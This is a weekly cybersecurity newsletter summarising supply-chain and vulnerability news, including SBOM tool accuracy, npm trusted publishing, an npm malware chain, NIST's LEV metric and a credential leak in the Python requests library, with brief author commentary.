CramHacks Chronicles #86: Weekly Cybersecurity Newsletter!

Hello, and Happy Monday!

I’ve been going a bit overboard on the caffeine lately. I’ve also been processing a ridiculous amount of information thanks to writing this newsletter and my desperate need to know every little thing that happens in this industry.

This past week has undoubtedly been productive, but I’m very much looking forward to sitting at the beach and probably surfing 🏄‍♂️.

Excited to be speaking at Planet Cyber Sec AppSec SoCal next week 🥳!

Newsletter

Correctness of SBOM Generation: A Differential Analysis Approach
A study comparing SBOMs generated by Trivy, Syft, Microsoft’s sbom-tool, and GitHub’s dependency graph. The research included SBOMs from 7,876 open-source projects written in Python, Ruby, PHP, Java, Swift, C#, Rust, Golang and JavaScript — then conducting a differential analysis of results.

👋 To no surprise, the results were inconsistent and not great for confidence in SBOMs. That said, the research used dated technologies. For instance, it used Trivy v0.43 which was released in June 2023—other tool versions used also reflect June 2023 releases.

CVE/FIRST VulnCon 2025 Videos Releases
Almost 100 videos covering everything from the current state of vulnerability management, future predictions, and research on the effectiveness of methodologies.

Coming Soon: OpenID Connect (OIDC) Support for npm Registry
npm has announced that public beta for Trusted Publishing is coming (tentatively) in July 2025, joining the likes of PyPI, RubyGems, and Dart’s Pub.dev. This leverages OIDC tokens generated during CI/CD workflows to authenticate directly with the registry.

👋 For those unfamiliar, this is an alternative to using long-lived tokens for publishing packages, which are commonly abused by malicious actors. We’re still a longways away from this being reasonable audited/enforced for open source packages, but I look forward to getting there 🤞. More than 30,000 PyPI projects have voluntarily adopted Trusted Publishing to date.

How Dynamic Analysis Revealed a Complex npm Attack Chain
SafeDep’s Kunal Singh share how they used their scalable dynamic malware analysis infrastructure to reveal an npm attack chain.

👋 I was mostly interested by how the malicious package worked. Instead of containing the payload or being a simplistic dropper, it used a post-install script that writes to a .env file to set a URL that is used in the code to fetch and trigger next steps. There are so many other malicious opportunities through abusing environment variables and similar system files 👀.

NIST: Proposes New Metric - Likely Exploited Vulnerabilities (LEV)
The equation leverages historical EPSS scores to provide the probability that a vulnerability has been observed to be exploited in the wild.

👋 EPSS is improving year-after-year, but I don’t know if it’s at a place where I’d be looking to build metrics based on its data. It has plenty of faults and I fear this just adds more variability. Cool research nonetheless, and likely effective at scale.

CVE-2024-47081: Netrc credential leak in PSF requests library
A vulnerability in the popular requests library was reported back in September 2024, and has not yet been fixed, nor has it been publicly disclosed (before this week). If you maintain a .netrc file containing credentials, they will be leaked to the target host.

👋 More discussion on Hacker News. Vulnerable code snippet here.

Weaponizing Dependabot: Pwn Request at its finest
Details on how to leverage GitHub bots, such as Dependabot, for a Confused Deputy attack, bypassing PR reviews to merge malicious code.

More Links

GitHub MCP Exploited: Accessing private repositories via MCP

Remote Prompt Injection in GitLab Duo Leads to Source Code Theft

👋 I honestly haven’t read either of these articles in-depth, but I’m not at all surprised. The world is moving too fast to be secure, and I’ve come to terms with that. What does tick me off is that many corporations, including the biggest one (the US govt) continue to cut funding on security programs. But if your business is dead, you don’t need security 🤷. Part of why I hate the instability of the tech industry — a company burning billions with a limited runway will never prioritize security.

Demonstrably Secure Software Supply Chains with Nix

Kyverno Best Practices: Policy Management That Scales in Kubernetes

Until Next Time! 👋

Hey, you made it to the bottom – thanks for sticking around!

Questions, ideas, or want to chat? Slide into my inbox! 💌

Don’t hesitate to forward if someone could benefit from this.

See you next Monday!
-Kyle

P.S. CramHacks has a Supporter tier! You can upgrade here to support CramHacks and its free weekly content 😃.